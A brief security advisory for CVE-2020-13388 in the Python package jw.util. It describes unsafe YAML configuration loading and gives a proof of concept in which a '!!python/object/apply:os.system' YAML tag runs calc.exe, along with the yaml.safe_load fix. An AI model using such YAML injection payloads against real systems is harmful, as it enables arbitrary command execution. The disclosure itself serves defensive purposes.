CVE-2020-13388：vulnerability in jw.util

Python Package:　　jw.util

Version:　　　　　 <= 2.3 

Reported by: 　　　　　 Joel

CVE-2020-13388 　　　CVE_details

Overview

An exploitable vulnerability exists in the configuration loading functionality of jw.util before 2.3. Configuration is a module for handling configurations from a YAML source and a class for simplifying access to a configuration tree. Load configuration from stream with YAML can execute arbitrary python commands resulting in command execution. An attacker can insert python into loaded yaml to trigger this vulnerability.

POC

1
2
3

from jw.util import configuration
configuration.FromString('!!python/object/apply:os.system ["calc.exe"]')
configuration.FromStream('!!python/object/apply:os.system ["calc.exe"]')

Remediation

It should use yaml.safe_load to parse yaml file.